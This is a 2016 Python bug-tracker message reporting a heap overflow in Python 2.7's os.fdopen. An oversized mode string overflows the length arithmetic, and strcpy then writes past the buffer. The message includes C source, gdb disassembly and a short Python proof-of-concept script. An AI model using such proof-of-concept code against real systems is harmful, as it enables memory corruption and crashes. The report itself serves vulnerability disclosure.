This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author madness
Recipients madness
Date 2016-06-05.18:01:37
SpamBayes Score -1.0
Marked as misclassified Yes
Message-id <1465149697.95.0.775433257828.issue27235@psf.upfronthosting.co.za>
In-reply-to
Content
I have tested this vulnerability on the Python 2.7 and it absolutely affected :). Integer overflow produce in posix_fdopen function. If an attacker sent fdopen mode value larger than max integer value (2*32) to fdopen after integer overflow occurred. 

    int fd;
    char *orgmode = "r";
    int bufsize = -1;
    FILE *fp;
    PyObject *f;
    char *mode;
    if (!PyArg_ParseTuple(args, "i|si", &fd, &orgmode, &bufsize))
        return NULL;

    /* Sanitize mode.  See fileobject.c */
    mode = PyMem_MALLOC(strlen(orgmode)+3);
    ...
    strcpy(mode, orgmode);

 os.fdopen(fd[, mode[, bufsize]])

fo = os.fdopen(fd, "r"*0xffffffff)

   0x5e2595 <+86>:	mov    edi,eax
=> 0x5e2598 <+89>:	call   0x416e50 <strlen@plt>     
(gdb) print /x $eax
$1 = 0xffffffff
after does addition of "add" instruction therefore overflow occured and => 0x5e259d <+94>:	add    eax,0x3
(gdb) print /x $eax
$5 = 0x2
and memory allocate after buffer copy== > 
   0x5e25a1 <+98>:	mov    edi,eax
   0x5e25a4 <+101>:	call   0x48f793 <_PyMem_DebugMalloc>
   0x5e25cb <+140>:	mov    esi,edx
   ...
   0x5e25ce <+143>:	mov    edi,eax
   0x5e25d1 <+146>:	call   0x416b80 <strcpy@plt>

copy buffer
strcpy(mode, orgmode); <=== overflow


poc:
#!/usr/bin/python

import os, sys

fd = os.open( "foo.txt", os.O_RDWR|os.O_CREAT )
fo = os.fdopen(fd, "r"*0xffffff)
print "Closed the file successfully!!"
History
Date User Action Args
2016-06-05 18:01:37madnesssetrecipients: + madness
2016-06-05 18:01:37madnesssetmessageid: <1465149697.95.0.775433257828.issue27235@psf.upfronthosting.co.za>
2016-06-05 18:01:37madnesslinkissue27235 messages
2016-06-05 18:01:37madnesscreate